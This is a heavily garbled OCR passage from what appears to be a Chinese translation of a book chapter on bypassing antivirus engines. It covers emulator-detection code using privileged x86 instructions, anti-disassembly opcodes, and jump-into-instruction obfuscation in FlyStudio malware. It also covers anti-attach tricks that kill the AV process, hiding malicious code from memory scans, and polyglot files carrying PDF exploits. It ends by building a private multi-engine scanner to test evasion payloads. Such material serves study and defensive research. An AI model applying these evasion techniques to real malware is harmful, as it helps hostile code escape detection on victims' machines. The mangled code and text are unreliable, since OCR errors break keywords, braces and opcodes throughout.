int test1 (void) 

( 
































try 
( 
asm 
( 
mov eax, 1 
mov dr0, eax 
j 
j 
catch...) 
( 
return EMULATOR NOT DETECTED; 
j 


return EMULATOR DETECTED; 
} 
上 述 代码 尝试 改变 注册 表 DR0 Intel x86， 该 调试 注册 表 是 不 允许 被 用 户 态 程序 修改 的 。 下 面 
是 另 一 个 技巧 : 


int test2 (void) 
{ 
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一 | 


mov eax, 1 
mov cr0, eax 
} 
) 
gath (ss) 
{ 
return EMULATOR_NOT_ DETECTED; 
} 


return EMULATOR DETECTED; 
j 


上 述 代码 试 着 更 改 另 外 一 个 特权 注册 器 一 一 cR0。 有 很 长 一 段 时 间 ,， Norman SandBox 人 允许 在 
沙 盒 模拟 器 中 执行 这 一 操作 。 下 面 是 另外 一 个 技巧 : 


int test3 (void) 
{ 

try 

{ 


. asm int 4 // aka INTO, interrupt on overflow E 
j 


gaten (oas) 
{ 





return EMULATOR_NOT_DETECTED; 
} 


return EMULATOR DETECTED; 
} 


Norman SandBox 过 去 常常 因为 INTO 指 令 衣 演 ( 溢出 标记 为 1 时 ,引发 中 断 号 为 4 的 内 部 中 断 )。 
同时 ， 它 也 会 因为 UpD2 指 令 (未 定义 的 指令 ) 和 未 有 文档 说 明 的 IcEBP 指 令 (ICE 断 点 ) 的 执行 
而 崩溃 。 

/** Norman Sandbox stopped execution at this point :( */ 


int test4(void) 
{ 





try 
{ 
. asm ud2 
} 
gatah (Cs) 
{ 
return EMULATOR, NOT DETECTED; 
j 


return EMULATOR DETECTED; 
j 


/** Norman Sandbox stopped execution at this point :( */ 
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int test5 (void) 
{ 
try 
( 
// icebp 
. asm emit Oxf1 
} 
catch(...) 
t 
return EMULATOR, NOT DETECTED; 
j 


return EMULATOR DETECTED; 

} 

你 可 以 通过 查阅 Intel x86 指 令 集 文档 ， 找 到 大 量 绕 过 反 病 毒 模 拟 器 的 技巧 。 比 如 ， 上 面 介 绍 
的 这 些 绕 过 反 病 毒 模 拟 器 的 CPU 指令 就 是 花费 两 天 时 间 查 阅 研究 的 成 果 。 

3. 使 用 抗 反 汇编 技巧 

抗 反 汇 编 是 一 项 扰乱 或 欺骗 反 汇 编 需 的 技巧 。 和 多 年 前 的 8086 ( 基础 指令 集 ) 和 8087 (FPU 
EE ) 架 构 不 同 , 如今 的 Intel x86 和 AMD x86. 64 架构 的 CPU 所 支持 的 指令 集 已 经 是 满 满 一 列 了 。 
如 今 指 令 集 包含 SSE、SSE2、SSE3、SSE4、SSE5、3DNow!、 MMX. VMX., AVX., XOP, FMA 
以 及 许多 其 他 指令 , 其 中 有 些 十 分 复杂 ,也 有 些 在 说 明文 档 中 部 分 提 及 或 完全 没有 提 及 。 大 部 分 
反 汇 编 分 析 模 块 只 能 处 理 基 础 的 指令 集 , 当然 也 有 部 分 反 汇 编 分 析 模 块 会 尽 可 能 多 地 去 覆盖 到 各 
类 指令 集 。 尽 管 有 一 部 分 反 汇 编 分 析 程 序 项 目 尝试 覆盖 到 所 有 指令 并 取得 了 不 错 的 效果 C 比如， 
Nguyen Anh Quynh 博 士 开发 的 Capstone disassembler 项 目 )， 但 是 要 想 覆 盖 到 所 有 指令 集 还 是 不 太 
可 能 的 。 

反 病 毒 产 品 中 使 用 的 反 汇 编 模 块 ,一般 要 么 是 由 类 似 Capstone disassembleri H Z5 148 us £l T 
有 指令 的 反 汇 编 模块 实现 的 ， 比 如 卡巴 斯 基 和 Panda 反 病毒 软件 ， 要 么 只 是 使 用 Gil Dabah 开 发 的 
旧版 ai storm 反 汇编 模块 ,该 项 目 以 BSD 证 书 的 方式 授权 以 供 下 载 。 根 据 反 病 毒 反 汇编 模块 的 不 
[E], 我 们 需要 手动 执行 分 析 , 来 找 出 传人 什么 指令 会 导致 反 汇编 模块 骨 演 。 一 位 反 病毒 工程 师 发 
现 了 下 面 这 段 用 于 抗 反 汇编 的 指令 : 

f30f1f90909090. rep nop [eax+0x66909090] 

Intel x86 的 NOP 指 令 一 般 会 被 编码 为 0x09， 但 是 仍 有 一 些 其 他 类 型 的 NOP 指令， 比如 上 面 列 
出 的 这 一 段 。 这 是 一 个 带 有 REP 前 级 (F3) 的 NOP 指 令 。NOP 指 令 引 用 了 内 存 地 址 [EAX+ 
0X66909090]。 因 为 指令 本 身 不 会 崩 演 ， 所 以 它 不 会 去 判断 引用 的 内 存 地 址 是 否 合法 。 但 由 于 
这 项 指令 并 不 常见 , 一 些 反 病毒 软件 在 反 汇编 该 指令 的 时 候 会 失败 。 也 难怪 ,这 个 指令 似乎 只 有 
感染 型 病毒 Sality 的 一 些 变 种 会 用 到 。 

由 于 许多 反 病毒 软 件 用 到 了 gistorm 反 汇编 库 , 我 们 需要 将 distorm 下 载 到 本 地 , 编写 测试 
代码 来 分 析 它 支持 的 指令 。 旧 版 本 的 BSD 无 法 支持 包括 AVX 或 vmx 在 内 的 诸多 指令 集 。 你 可 以 使 
用 不 支持 的 指令 集 的 最 小 子 集 ,在 使 用 过 程 中 注意 这 些 指令 不 会 导致 样本 或 ShellCode 程 序 执行 失 
败 。 通 过 使 用 上 面 提 到 的 这 些 无 法 支持 的 指令 ,可 以 让 样本 文件 绕 过 任何 通用 扫描 程序 ， 因 为 这 

































































































































































8.1 绕 过 技术 的 通用 提示 和 策略 113 





些 扫描 程序 使 用 了 无 法 正确 解析 这 些 指令 的 反 汇 编 引 擎 。 另 外 ， 有 各 式 各 样 的 方式 来 编码 指令 ， 
也 有 一 些 指令 可 能 在 Intel x86 指 南 中 未 有 提 及 或 尚未 完善 。 接 下 来 的 例子 就 是 一 些 合法 但 说 明文 
档 中 未 有 记载 的 指令 。 旧 版 本 的 aistorm 和 其 他 一 些 类 似 udisx86 这 样 的 免费 反 汇 编程 序 ， 就 无 
法 正确 解析 以 下 指令 : 

OF 20 00: MOV EAX, CRO 

OF 20 40: MOV EAX, CRO 

OF 20 80: MOV EAX, CRO 

OF 21 00: MOV EAX, DRO 


OF 21 40: MOV EAX, DRO 
OF 21 80: MOV EAX, DRO 


尽管 上 述 指 令 均 为 特权 指令 , 我 们 还 是 可 以 用 它们 来 触发 一 个 异常 ,接着 使 用 构造 好 的 异常 
处 理 器 进行 处 理 。 

4. 通过 反 分 析 技 巧 干扰 代码 分 析 模 块 

男 一 项 通用 技巧 是 使 用 反 分 析 技 巧 。 这 项 技巧 用 于 干扰 反 病毒 软件 中 的 代码 分 析 模 块 ， 比 如 
针对 Intel x86 代 码 分 析 样 本 的 基础 区 块 和 函数 的 程序 。 这 类 技术 通常 依赖 于 在 一 条 x86 或 x86_64 
指令 中 部 搬入 混 消 或 垃圾 代码 。 为 了 更 好 理解 这 一 技巧 ， 你 可 以 使 用 SHA1 为 405950ela- 
93073134bce2660a70b5ec0cfb39eab 的 样本 进行 分 析 。 汇 编 代码 如 图 8-1 所 示 。IDA 的 反 汇 编 
结果 显示 ， 在 入 口 点 并 不 存在 函数 ， 只 有 两 个 基础 区 块 。 


.text:0045402C 
.text:0045402C 
.text:0045402C public start 
.text:0045402C start: 
.text:0045402C EB 03 jmp short loc 454031 
.text:0045402C ; - = -— = 

ext:0045402E 0B 95 dw 950Bh 

1030 39 db 39h 



































loc 454031: ; CODE XREF: .text:startfj 


:00454033 73 07 jnb short near ptr loc 45403A*2 


loc 45403A: 
.-text:0045403A E9 BA E8 05 00 
.text: 


403F 00 
10 00 7A 7B 41 41 37 SE 73+ 
10 O6 95 7A SE 6A CC 06 81+ 
54040 C6 BF FF FF FF EB 02 8B+ 
10 04 83 3E OO F9 72 07 62+ 
10 74 79 6C 7E B6 35 OF 84+ 


8-1 恶意 软件 FlyStudio 的 反 汇 编 代 码 


该 程序 的 大 多 数 代 码 都 没有 被 IDA 反 汇编 出 来 。 这 是 为 什么 呢 ? 让 我 们 仔细 看 看 人口 点 
0x45402C， 它 无 条 件 地 跳 转 到 了 指令 0ox454031 处 。 接 着 程序 又 执行 了 指令 PUSHA 和 CcLC， 接 着 
是 一 个 有 条 件 的 跳 转 (jump if not below, JNB )。 但 此 处 的 条 件 跳 转 并 不 常见 ， 因 为 它 跳 转 到 了 
一 个 预定 义 的 地 址 中 部 :，0x45403A + 2。 这 是 什么 原理 呢 ?” 这 是 由 于 混淆 代码 从 条 件 跳 转 的 错 
误 分 支 跳 转 到 了 正确 指令 中 部 。IDA 不 能 静态 分 析 决 定 到 底 要 跳 转 到 JNB 指 令 对 应 的 两 个 分 支 中 
的 哪 一 个 ， 所 以 IDA 把 两 个 条 件 分 支 都 试 了 一 壳 。 但 只 有 一 个 条 件 分 支 会 被 接受 执行 ， 恶意 软件 
作者 在 指令 中 部 设置 了 一 个 跳 转 ,这样 就 可 以 干扰 IDA 的 自动 分 析 功 能 ， 同 时 还 可 以 干扰 其 他 反 
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y 





病毒 产品 中 内 置 的 代码 分 析 器 。IDA 人 允许 我 们 手动 确定 反 汇 编列 表 ， 这样 就 能 显示 正确 的 反 汇 编 
结果 ， 结 果 如 图 8-2 所 示 。 


:0045402C public start 

:10045402C start: 

:0045402C EB 03 jmp short loc, 454031 
0045402C ; 
0045402E OB 95 

454030 39 

00454031 ; 
:00454031 

100454031 loc 454031: ; 
:00454031 60 
:00454032 F8 
:00454033 73 07 short loc 45403C ; This is our old jump 

00454033 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 | 




















h 


OAAh 





:0045403C jo--------------------------------------------------------------------------- 











.text:0045403C 
.text:0045403C loc, 45403C: ; .text:004540331j 
.text:0045403C E8 05 00 00 00 call loc. 454046 

.text:00454041 7A 7B jp short near ptr loc_4540BD+1 

.text:00454043 41 inc ecx 

.text:00454044 41 inc ecx 

.text:00454045 37 aaa 

.text:00454046 

.text:00454046 loc 454046: ; REF: .text:loc 
.text:00454046 5E pop esi 

.text:00454047 73 06 jnb short loc 45404F 

.text:00454049 95 xchg eax, ebp 

.text:0045404A 7A 5E jp short loc_4540AA 

.text:0045404C 6A CC push OFFFFFFCCh 

.text:0045404E 06 push es 

.text:0045404F 

.text:0045404F loc 45404F: ; CODE XREF: .text:004540471j 
.text:0045404F 81 C6 BF FF FF FF add esi, OFFFFFFBFh 

.text:00454055 EB 02 jmp short loc 454059 














图 8-2 ”经 过 调整 后 ，IDA 显 示 出 更 多 关于 恶意 软件 FlyStudio 的 反 汇 编 结果 


经 过 修改 以 后 ，IDA 反 汇编 出 了 更 多 的 代码 。 你 甚至 可 以 选择 从 “start” 人 入口 点 到 INB 条 件 
跳 转 的 指令 。 这 时 候 按 下 P 键 ，IDA 创 建 了 函数 流程 图 (参见 图 8-3 )。 








public start 
start proc near 


h iUNK 


short loc 454031 



























loc 45403C: 
call loc, 454046 
jp short near ptr loc  4540BD41| 


























图 8-3 ”FlyStudio 的 部 分 函数 


8.1 绕 过 技术 的 通用 提示 和 策略 115 





但 上 面 的 函数 看 起 来 有 点 怪 怪 的 : 它 只 有 四 个 基本 区 块 , 错误 的 分 支 没有 被 去 除 ， 看 起 来 似 
平 错误 的 指令 位 于 最 后 一 个 基本 区 块 处 ,这 是 因为 男 一 处 代码 混淆 让 指令 跳 转 到 了 真实 的 指令 中 
部 。 我 们 注意 到 ，JP 指 令 跳 转 到 了 0x4540BD + 1， 这 和 之 前 我 们 使 用 的 技巧 如 出 一 辐 。 如 果 在 
IDA 中 修正 此 处 的 代码 混淆 ， 以 及 其 他 会 造成 条 件 跳 转 到 指令 中 部 的 混淆 人 代码， 最终 会 得 到 水 数 
的 真实 流程 图 ， 如 图 8-4 所 示 。 
































图 8-4 ”FlyStudio 的 主 函 数 流程 图 


正确 的 流程 图 可 以 用 于 从 基础 区 块 中 提取 相关 信息 , 并 根据 区 块 间 关系 生成 有 针对 性 的 基于 
流程 图 的 特征 码 。 跳 转 进 入 相关 指令 当中 的 代码 混淆 ,可 以 中 断 复杂 但 不 完善 的 反 病毒 静态 分 析 
模块 的 代码 分 析 过 程 。 这 让 类 似 IDA 这 样 的 代码 分 析 引 苟 或 反 病毒 软件 内 的 分 析 模 块 ， 无 法 从 样 
本 中 读 取 到 正确 的 信息 。 正 是 因为 相关 模块 收集 的 流程 图 信息 不 完善 , 利用 这 样 的 技巧 , 可 以 其 
骗 代 码 分 析 引 擎 并 绕 过 所 有 基于 程序 流程 图 和 调用 图 的 扫描 程序 。 在 其 他 案例 中 , 通用 侦 测 程序 
尝试 遍历 指令 直到 发 现 一 些 特殊 的 判断 文件 是 病毒 的 依据 , 也 会 因为 代码 混淆 和 样本 使 用 的 反 调 
试 技巧 而 被 绕 过 。 

5. 更 多 绕 过 技巧 

还 有 很 多 可 以 用 于 干扰 反 病 毒 软件 正确 分 析 、 绕 过 反 病 毒 引 擎 的 绕 过 技巧 。 接 下 来 将 列举 其 
中 最 有 趣 的 一 些 技巧 。 

e 反 附 加 调试 

反 附加 调试 技术 用 于 阻止 调试 器 附加 到 当前 进程 上 。 一 些 反 病毒 产品 会 附加 到 某 些 进程 上 ， 
从 中 读 取 内 存 信息 ， 然 后 匹配 恶意 软件 特征 码 ， 同 时 对 内 存 页 面 开展 通用 扫描 检测 。 逆 向 工程 分 
析 师 Walied Assar 最 近 发 现 并 公开 了 一 些 针 对 反 附 加 调试 的 技巧 。 让 我 们 来 看 一 个 例子 。 在 
Windows 操 作 系 统 中 ， 如 果 调 试 器 要 将 自身 附加 到 某 一 进程 上 ， 它 需要 在 进程 中 创建 一 个 远程 线 
程 。 每 当 创 建 一 个 线程 ， 操 作 系 统 加 载 器 就 会 调用 线程 本 地 存储 (thread local storage, TLS )。 举 
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例 来 说 ， 这 就 意味 着 ， 可 以 创建 一 个 TLS 返 回 操作 ， 增 加 一 个 全 局 变量 值 。 如 果 该 全 局 变量 的 数 
值 大 于 之 前 在 程序 中 预定 义 的 线程 数量 , 就 可 以 借 此 追溯 创建 远程 线程 的 进程 。 接 着 , 你 编写 的 
样本 程序 可 以 结束 远程 线程 对 应 的 进程 ( 本 例 中 ， 对 应 进程 是 反 病 毒 软件 )， 这 样 调试 器 就 无 法 
继续 进行 分 析 了 。 关 于 该 技术 更 详细 的 介绍 可 以 通过 下 列 地 址 获取 : http://waleedassar.blogspot. 
com.es/2011/12/debuggers-antiattaching-techniques_15.html。 此外，Walied Assar 在 博客 中 还 介绍 了 
其 他 许多 反 附 加 调试 技巧 : http://waleedassar.blogspot.com.es/。 

e 跳 过 内 存 页 

不 通过 附加 到 相关 进程 上 读 取 进程 内 存 ( 反 病毒 软件 大 都 采取 这 类 手段 ,因为 附加 到 进程 上 
读 取 内 存 信息 是 一 种 十 分 具有 侵入 性 的 手段 ) 的 反 病 毒 引 苟 通 常 采 取 以 下 步 又 : 

(1) 调用 openProcess; 

(2) 多 次 调用 VirtualOuery 来 确定 内 存 页 ; 

(3) 使 用 ReadProcessMemory 读 取 内 存 页 的 第 一 个 字 节 。 

但 是 ， 出 于 性 能 方面 的 原因 ,尤其 是 桌面 版 的 反 病毒 引 敬 ， 是 无 法 读 取 到 可 执行 程序 所 有 内 
存 页 面 中 的 所 有 字 节 内 容 的 。 例如 ，Microsoft Notepad 在 Windows x86 的 运行 实例 会 包含 所 有 系统 
附加 的 DLL 内 存 区 块 ( ntdll、kernel32、advapi、gdi32 等 )， 程 序 所 有 的 内 存 区 块 ( 代码 部 分 、 数 
据 部 分 等 ) 以 及 所 有 真实 运行 过 程 中 创建 的 内 存 区 块 ( 栈 、 堆 以 及 虚拟 内 存 )。 这 些 加 起 来 大 概 
有 222 个 不 同 的 内 存 页 面 。 在 这 种 情况 下 ， 反 病毒 引擎 会 使 用 相关 办 法 来 丢弃 并 缩小 待 扫描 的 内 
存 页 面 。 大 多 数 扫描 器 会 跳 过 大 的 内 存 页 面 , 或 者 直接 分 析 每 个 内 存 页 面 的 第 一 个 字 节 。 也 正 是 
出 于 这 样 的 原因 , 我 们 可 以 在 创建 的 内 存 页 面 内 , 通过 将 相关 代码 和 字符 串 在 内 存 页 面 开 头 向 后 
移动 几 个 千 字 节 (〈 甚 至 是 兆 字 节 )， 来 对 反 病 毒 引擎 隐藏 代码 逻辑 。 有 些 反 病毒 在 侦 测 过 程 中 只 
会 读 取 内 存 页 面 开头 的 几 个 千 字 节 (一 般 是 1024 KB 或 1 MB )， 这 样 就 会 遗漏 掉 这 些 字 节 之 后 的 
真实 数据 和 代码 。 

男 一 个 技巧 是 ， 目 前 有 一 些 反 病毒 软件 只 会 侦 测 被 标记 为 RWX 或 RX 的 内 存 页 面 。 因 此 ， 我 
们 可 以 通过 将 带 有 恶意 代码 逻辑 的 多 个 内 存 页 面 设置 为 只 读 (readable only, RO); 当 系 统 尝 试 
执行 这 些 内 存 页 面 中 的 代码 时 , 会 抛 出 一 个 异常 。 抛 出 异常 后 , 我 们 可 以 暂时 将 内 存 页 面 标记 为 
RX， 继 续 执行 ， 然 后 再 次 将 内 存 页 面 设置 为 只 读 状 态 。 这 只 是 在 用 户 态 欺骗 反 病 毒 软件 内 存 分 
析 的 成 千 上 百 种 技巧 之 一 。 但 是 , 要 绕 过 在 内 核 态 开展 内 存 分 析 的 反 病 毒 引 苟 就 有 些 困 难 了 ( 尽 
管 上 面 最 后 一 个 技巧 在 某 些 情况 下 可 能 会 有 效 )。 

6. 造成 文件 格式 混乱 

男 一 个 策略 是 混淆 文件 格式 ， 它 可 以 用 于 广泛 绕 过 针对 文件 格式 的 反 病 毒 侦 测 。 例 如 ， 假 
设 有 一 个 PDF 文 件 。Adode Acrobat Reader 是 如 何 确定 这 个 文件 是 否 是 PDF 格式 的 呢 ? 除了 取决 
于 产品 的 版 本 外 ， 还 有 一 个 通用 的 法 则 : 在 前 256 字 节 的 任意 位 置 有 魔术 字符 串 sPDF-1.X 的 任 
何 文件 都 会 被 视 为 PDF 格式 的 文件 。 因 此 ， 你 可 以 创建 一 个 正常 的 文件 ， 里 面 携带 了 含有 漏洞 
利用 程序 的 正常 PDF 文件 。 例 如 ,我们 可 以 创建 包含 合法 PDF 漏洞 利用 程序 的 PE 文件 、ZIP 文 件 
或 JPG 文 件 等 。 
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提示 如果 你 对 多 语言 文件 格式 感 兴趣 ， 可 以 参照 Corkami wiki 中 的 多 语言 网 页 。 里面 有 大 量 的 
多 语言 范例 ， 包 括 一 个 既 包 含 PDF 又 带 有 JavaScript 的 HTML 文 件 ， 同 时 它 还 是 一 个 有 效 
的 Windows PE 可 执行 文件 。 该 网 页 如 下 : https://code.google.com/p/corkami/wiki/mix。 
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有 时 ， 你 需要 绕 过 目标 组 织 内 使 用 的 一 个 或 多 个 反 病 毒 扫 描 器 ， 主 要 是 在 进行 渗透 测试 时 。 
有 一 些 工具 可 以 帮助 我 们 绕 过 反 病 毒 软件 ， 如 Veil Framework。 不 过 ， 你 需要 使 用 类 似 VirusTotal 
的 公共 多 引擎 扫描 服务 来 测试 payload 是 否 会 被 侦 测 到 。 但 是 如 果 使 用 payload 会 花费 较 长 时 间 ， 
那么 使 用 VirusTotal 测 试 就 不 是 一 个 好 的 选择 了 。 原 因 很 简单 , 一旦 你 上 传 一 个 样本 到 VirusTotal， 
所 有 反 病 毒 公司 就 都 能 够 获取 到 该 样本 。 总 的 来 说 是 不 错 的 , 但 如 果 你 想 保 持 上 传 样本 的 私密 性 
以 确保 其 绕 过 你 日 常 使 用 的 反 病 毒 产 品 ， 就 需要 使 用 与 VirusTotal 类 似 的 私有 蔡 代 方 案 。 本 节 前 
半 部 分 将 讲解 如 何 创 建 个 人 私有 的 多 引擎 反 病 毒 程 序 , 后 半 部 分 讲解 如 何 借助 它 来 创建 一 个 自动 
工具 以 躲避 反 病 毒 检 测 。 























8.2.1 初始 步骤 


本 节 将 展示 如 何 写 出 一 个 简单 的 反 病毒 绕 过 工具 ,我 们 会 解释 除了 安装 操作 系统 以 外 的 每 一 
个 必要 的 步骤 。 你 需要 安装 以 下 工具 。 
a 虚拟 机 ”本 例 中 ， 我 们 使 用 VirtualBox。 
O 一 套 Linux 操 作 系 统 ” 这 里 使 用 Ubuntu Desktop 14。 
口 一 种 可 以 使 用 多 引擎 扫描 文件 或 目录 的 工具 ”全 部 使 用 Python 开 发 的 开源 软件 MultiAV 就 
是 这 样 一 个 工具 。 可 以 从 https://github.com/joxeankoret/multiav 下 载 。 
口 多 款 反 病毒 产品 ”我们 选用 免费 的 反 病 毒 产 品 的 Linux 版 本 (也 可 以 使 用 Wine 来 运行 对 应 
的 Windows 版 本 )。 
口 用 于 绕 过 反 病 毒 软件 的 toolkit 或 基础 库 文件 尽管 可 以 使 用 更 完整 的 Veil Framework， 不 

过 这 里 我 们 准备 使 用 一 种 完全 使 用 Python 开 发 的 PE 文件 检测 绕 过 工具 : peCloak.py。 

首先 , 我 们 需要 创建 一 个 32 位 的 虚拟 机 并 安装 Ubuntu。 操作 系统 的 安装 不 在 本 书 介 绍 范围 之 
内 ， 因 此 我 们 会 跳 过 此 步骤 ， 直 接 讨 论 MultiAV 的 安装 。 在 此 之 前 一 定 要 确保 安装 了 客户 端 增强 
包 ， 以 便 更 容易 地 进行 接 下 来 的 各 项 操作 ， 同 时 把 网 卡 配置 为 Bridged， 这 样 就 可 以 连接 到 虚拟 
机 内 部 的 TCP 监 听 服 务 了 。 成 功 安装 带 有 Ubuntu Linux 系 统 的 虚拟 机 和 客户 端 增强 包 后 ， 继 续 安 
装 git 并 下 载 MultiAV 的 源 代码 : 

$ sudo apt-get install git 

安装 好 GIT 工 具 后 ， 输 入 以 下 命令 ， 下 载 MultiAV 的 源 代 码 。 


$ cd SHOME 
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$ git clone https://github.com/joxeankoret/multiav 

MultiAV 的 源 代码 下 载 完 成 后 , 还 有 反 病 毒 产 品 没有 安装 , 这 就 是 我 们 接 下 来 要 进行 的 操作 。 

1. 安装 ClamAV 

我 们 需要 安装 第 一 款 反 病毒 产品 。 从 简单 的 开始 安装 : CalmAV。 需 要 安装 带 实时 防护 版 本 
和 Python binding， 还 需要 获取 最 新 的 病毒 特征 数据 库 并 启动 CalmAV 实 时 防护 。 

$ sudo apt-get install python-pyclamd clamav-daemon 


$ sudo freshclam # download the latest signatures 
$ sudo /etc/init.d/clamav-daemon start # start the daemon 


如 果 一 切 顺 利 , ClamAV 和 MultiAV 要 用 到 的 Python binding 就 可 以 正常 运行 了 。 输 入 以 下 指令 
来 测试 该 扫描 器: 








$ mkdir malware 

$ cd malware 

$ wget http://www.eicar.org/download/eicar.com.txt 

$ clamdscan eicar.com.txt 

/home/joxean/malware/eicar.com.txt: Eicar-Test-Signature FOUND 


----------- SCAN SUMMARY ----------- 
Infected files: 1 
Time: 0.068 sec (0m 0 s) 


简单 执行 以 下 Python 指令 来 验证 Python binding 没 有 出 错 : 
$ python 


Python 2.7.6 (default, Mar 22 2014, 22:59:38) 
[GCC 4.8.2] on linux2 


Type "help", "copyright", "credits" or "license" for more information. 
>>> import pyclamd 
>>> 


接 下 来 要 安装 更 多 反 病 毒 产品 。 我 们 使 用 以 下 几 款 : 
O Avast Linux 版 ”使 用 30 天 使 用 版 ; 
口 AVG Linux 版 ”对 家 庭 用 户 免费 ; 
口 F-Prot Linux 版 ”对 家 庭 用 户 免 费 ; 
O Comodo Linux 版 ”有 免费 版 可 用 ; 
O Zoner Antivirus Linux 版 ”到 目前 为 止 ， 所 有 产品 都 是 免费 的 。 
2. 安装 Avast 
可 以 从 以 下 地 址 下 载 Avast Core Security Linux 试 用 版 : https://www.avast.com/linux-server- 
antivirus。 
在 安装 过 程 中 ， 需 要 一 个 有 效 的 电子 邮件 地 址 。 一 旦 获取 到 了 许可 密 钥 ，Ubuntu repository 
和 在 邮箱 收 件 夹 中 的 GPG 密 钥 使 用 以 下 命令 安装 该 产品 : 
# echo "deb http://deb.avast.com/lin/repo debian release" >> 
/etc/apt/sources.list 


# apt-key add /path/to/avast.gpg 
# apt-get update 
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4 apt-get install Avast 
运行 上 述 命令 后 , 复制 附件 许可 证 文件 到 /etc/avast 目 录 ， 把 文件 名 命名 为 license.avastlic。 许 
可 证 有 效 期 为 30 天 ， 不 过 已 经 足够 我 们 创建 一 个 基础 的 MultiAV 来 进行 测试 了 。 执 行 以 下 指令 ， 
确定 可 以 正常 运行 ,: 
sudo /etc/init.d/avast start 
mkdir malware 
cd malware 
wget http://www.eicar.org/download/eicar.com.txt 
$ scan eicar.com.txt 


/home/joxean/malware/eicar.com.txt 
EICAR Test-NOT virus!!! 


3. 安装 AVG 

接 下 来 要 安装 的 反 病 毒 软 件 AVG ， 需 要 从 以 下 链接 下 载 : http:/download.avgfree.comyfiledir/ 
inst/avg2013flx-r3118-a6926.1386.deb。 

滑动 至 页 面 底部 ， 找 到 i386.DEB 安 装 包 。 本 书写 作 时 最 新 版 本 对 应 的 下 载 地 址 是 : 
http://download.avgfree.com/filedir/inst/avg2013flx-r3118-a6926.1386.deb。 

下 载 好 DEB 安 装 包 文件 后 ， 执 行 以 下 指令 完成 安装 。 


$ sudo dpkg -i avg2013flx-r3118-a6926.1386.deb E 


整个 安装 过 程 只 需要 上 述 一 条 命令 。 现 在 ， 通 过 扫描 eicar.com.txt 来 验证 安装 成 功 。 


$ 
$ 
$ 
$ 











$ avgscan /home/joxean/malware/eicar.com.txt 
AVG command line Anti-Virus scanner 
Copyright (c) 2013 AVG Technologies CZ 


Virus database version: 3657/6926 
Virus database release date: Mon, 16 Dec 2013 22:19:00 +0100 


/home/joxean/malware/eicar.com.txt Virus identified EICAR Test 


Files scanned 1 
Infections found 1 
PUPs found 0 
Files healed : 0 
Warnings reported : 0 
Errors reported 0 


安装 成 功 ! 接着 安装 其 他 反 病 毒 软件 : F-Prot、Comodo 和 Zoner。 

4. 安装 F-Prot 

由 Gzip 打包 的 tar 文 件 格式 的 F-Prot Linux 版 安装 包 可 以 通过 如 下 页 面 下 载 : http://www.f-prot. 
com/download/home user/download fplinux.html。 

完成 下 载 后 ， 运 行 以 下 命令 解压 缩 : 

$ tar -xzvf fp-Linux.x86.32-ws.tar.gz 


然后 ， 进 入 创建 好 的 fprot 目 录 并 执行 以 下 命令 : 
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$ sudo perl install-f-prot.pl 
接受 所 有 默认 条 款 ， 继 续 执 行 安装 操作 。 等 待 一 段 时 间 之 后 ， 最 新 版 本 的 F-Prot 反 病毒 特征 
数据 库 和 反 病 毒 软 件 就 全 部 安装 成 功 了 。 可 以 通过 运行 以 下 命令 验证 安装 是 否 成 功 。 


$ fpscan -r /home/joxean/malware/eicar.com.txt 


T 














F-PROT Antivirus CLS version 6.7.10.6267, 32bit (built: 2012-03-27T712-34-14) 


FRISK Software International (C) Copyright 1989-2011 
Engine version: 4.6.5.141 
Arguments: -r /home/joxean/malware/eicar.com.txt 
Virus signatures: 201506020213 

(/home/joxean/sw/f-prot/antivir.def) 


[Found virus] «EICAR Test File (exact)» 
/home/joxean/malware/eicar.com.txt 
Scanning: 





Results: 


Files: 1 

Skipped files: 0 

MBR/boot sectors checked: 0 
Objects scanned: 1 

Infected objects: 1 
Infected files: 1 

Files with errors: 0 
Disinfected: 0 


Running time: 00:01 


ja 


5. 安装 Comodo 
Comodo 反 病毒 软件 Linux 版 可 以 通过 如 下 页 面 下 载 : https://www.comodo.com/home/internet- 


Security/antivirus-for-linux.php。 

点 击 Download Now 按 钮 ， 进 入 下 一 页 ， 选 择 Ubuntu 和 32bit 并 点 击 下 载 。 在 编写 本 书 的 时 候 ， 
可 供 下 载 的 Debian 安 装 包 文件 为 cav-linux_1.1.268025-1_i386.deb。 和 安装 AVG 的 操作 类 似 ， 我 们 
可 以 通过 执行 以 下 命令 进行 安装 : 

$ sudo dpkg -i cav-linux 1.1.268025-1 i386.deb 

安装 完成 后 ， 系 统 会 提示 必须 以 root 权 限 运行 配置 Comodo 的 命令 。 你 需要 运行 以 下 命令 : 








$ sudo /opt/COMODO/post setup.sh 

接受 安装 协议 和 默认 配置 。 然 后 ， 运 行 以 下 命令 以 升级 病毒 特征 数据 库 : 

$ /opt/COMODO/cav 

GUI 会 提示 病毒 特征 数据 库 从 未 更 新 过 。 点 击 Never Updated 链 接 按钮 ， 下 载 最 新 的 病毒 特征 
数据 库 。 所 有 反 病毒 特征 数据 库 下 载 完毕 后 , 可 以 执行 以 下 指令 来 测试 反 病 毒 软件 是 否 正常 运行 。 
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$ /opt/COMODO/cmdscan -v -s /home/joxean/malware/eicar.com.txt 
eA s2 Scan Start 22----- 
/home/joxean/malware/eicar.com.txt ---» Found Virus, Malware Name is Malware 


Number of Scanned Files: 1 
Number of Found Viruses: 1 


与 Comodo 配 套 的 命令 行 扫描 器 cmdscan 有 一 些 限制 。 第 2 章 介 绍 过 如 何 创建 能 与 MultiAV 交 
互 的 、 属 于 我 们 自己 的 cmdscan( 一 个 改良 版 的 Comodo 命 令 行 扫描 器 ), 稍 后 我 们 将 结合 MultiAV 
使 用 这 个 改良 版 的 工具 。 


6. 安装 Zoner Antivirus 


下 面 来 安装 最 后 一 款 反 病 毒 软 件 : Zoner Antivirus。 其 Linux 版 可 以 通过 以 下 链接 下 载 : 
http:/www.zonerantivirus.comy/stahnout2os=linux。 

选择 Zoner Antivirus 的 GNU/Linux 、 适 用 于 Ubuntu 以 及 32 位 的 版 本 ， 然 后 点 击 下 载 按钮 。 它 
会 下 载 另 一 个 .DEB 安 装 包 文 件 。 安 装 过 程 和 前 几 个 一 样 容 易 。 

$ dpkg -i zav-1.3.0-ubuntu-i386.deb 

安装 完毕 后 ,获取 密 钥 ， 激 活 产品 ， 下 载 最 新 版 反 病毒 特征 数据 库 文 件 。 你 可 以 通过 以 下 链 
接 注 册 : http:/www.zonerantivirus.comyaktivace-produktu。 am 















































